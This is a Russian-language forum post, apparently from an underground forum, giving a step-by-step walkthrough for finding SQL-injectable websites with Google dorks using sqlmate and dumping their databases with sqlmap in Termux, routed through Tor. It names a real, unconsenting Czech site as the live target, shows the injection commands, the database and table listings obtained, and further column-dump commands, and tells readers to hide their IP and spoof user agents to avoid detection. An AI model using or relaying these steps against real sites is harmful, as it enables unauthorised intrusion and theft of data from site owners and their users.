✍️ Статья Поиск и слив БД по гугл доркам. Используем sqlmap + sqlmate +termux

The 146X Project Dublikat Web Studio Avram Lincoln AL Service Navigator Knyaz

BlackPope

Команда форума
Модератор DeepWeb ✔️
PR-Group DeepWeb 🔷
Регистрация
27.04.2020
Сообщения
230
Рассмотрим поиск уязвимых сайтов по гугл доркам с помощью sqlmate и раскрутку в следствии и дамп базы данных с помощью sqlmap на примере.

Тот пример, который я приведу, скорее из тех сайтов, что сливались до меня овер 100500 раз. Так что не замазывая адресс хоста, я ничего собстно еще хужего не сделаю. Поехали.

Инсталим инструменты

Ставим необходимые пакеты.

Пишем:

pkg install git python python-dev python2 python2-dev

Ставим sqlmap.

pip2 install sqlmap

Проверим. Для запуска пишем

sqlmap

Вот так выглядит sqlmap

-uAyit7d4Z4.jpg


Ставим sqlmate

Копируем используя git

git clone https://github.com/s0md3v/sqlmate

Дальше идем в папку и ставим зависимости:

cd sqlmate
pip2 install -r requirements.txt


Проверяем, для запуска пишем:

python2 sqlmate

Вот так выглядит sqlmate ☺

NHWS20e62X4.jpg


Ставим Tor

0j6RCYPHxK8.jpg


Ты же не хочешь в гости маски-шоу как на картинке снизу?


Тогда в темных делах айпишник свой палить не следует.

Для этого ставим Тор

pkg install tor

Открываем новую вкладку в термуксе и запускаем, просто пишем

tor

Когда увидите Bootstrapped 100%:Done , это значит, что тор уже запущен и настроен, можно приступать.

EN5aHaKxAWg.jpg


Юзаем sqlmate, ищем дырявые сайты

Sqlmate ищет и сразу чекает сайты по гугл доркам(тоже рассмотрим позже) на предмет sql injection, скорее всего банальной подставкой ‘ в конце запроса. Не смотрел исходники, но обычно на этом алгоритме основаны очень многое количество такого типа паблик программ.

Заходим в папку со sqlmate и запускаем

cd
cd sqlmate && python2 sqlmate


7YuzaQHn8iI.jpg


Сразу просит ввести дорку. Дорки можно найти в гугле под сайты, которые вам нужны, достаточно поискать. Небольшой список я напишу в конце статьи, остальное найдете сами, или же я начну проводить раздачи когда то☺ Планов как у Наполеона, времени лишь бы хватало)

Кстати, что такое дорки и как ими пользоваться мы подробней рассмотрим в одной из следующих статей.

В пример используем дорку index.php?id=+site:cz , указываем ее и жмем энтэр.

QC_vcQmFKGM.jpg


Сразу видим 2 уязвимые сайты, к примеру я выбрал kuchynepinos.cz.

Открываем новую вкладку в термукс, походу уже 3-ю) мне так удобней лично, в ней мы будем юзать sqlmap.

Раскручиваем уязвимый сайт со sqlmap

cE2EBXpUbH8.jpg


В новой вкладке пишем

sqlmap --random-agent -tor --dbs -u http://www.kuchynepinos.cz/index.php?id=18

Или если вы используете zsh оболочку как я, то пишем

sqlmap --random-agent -tor --dbs -u http://www.kuchynepinos.cz/index.php\?id\=18

Не знаю, почему zsh просит добавлять обратные слэши, но пишет что надо, по этому спорить не будем☺

Разбор запроса: sqlmap --random-agent -tor --dbs -u http://www.kuchynepinos.cz/index.php\?id\=18

-- random-agent - даешь команду sqlmap использовать случайные юзер-агенты при запросе. Потому что по дэфолту sqlmap использует свой, где указано что тестируется сайт с проги sqlmap проще говоря. А это довольно палевно :D

-tor - делаем все запросы через Tor

--dbs - означает показать текущие базы данных, в случае успешной атаки.

Ну и -u <адресс> - сам уязвимый url, ну, предполагаемо.

Дальше зададутся в процессе теста вопросы, там уже отвечаете Y или N по своему усмотрению.

И так, в конце мы получили вот такой результат

9CdeFPZTgbo.jpg


Судя по

available databases [2]:
[*] information_schema
[*] kuchynepin1


все получилось, скрипт действительно уязвимый и мы получили текущие БД.

information_schema — не имеет ничего для нас интересного, это дэфолтная бд

kuchynepin1 — а вот в эту бд мы и заглянем, что там интересного.

Далее берем эту бд и смотрим какие есть таблицы:

sqlmap --random-agent -tor -u http://www.kuchynepinos.cz/index.php\?id\=18 -D kuchynepin1 --tables

Xx0AQ0Q95lQ.jpg


-D название БД --tables — этой командой мы берем бд и просим показать нам ее таблицы-

Как видим есть одна таблица texty , в которой скорее всего нет никуя интересного, но это чисто для общего понимания пример так сказать.

Еще команды:

-D <название БД > -T <название таблицы > --columns — смотрим колонки в нужной таблице

-D <название БД > -T <название таблицы > --C < название колонки> --dump — тут мы берем нужную колонку и делаем ее дамп, можно указывать пару колонок через запятую вида (колонка,колонка2,колонка3)

Заключение
Надеюсь статья была полезной.
 

📌 Золотая реклама

AnonPaste

Верх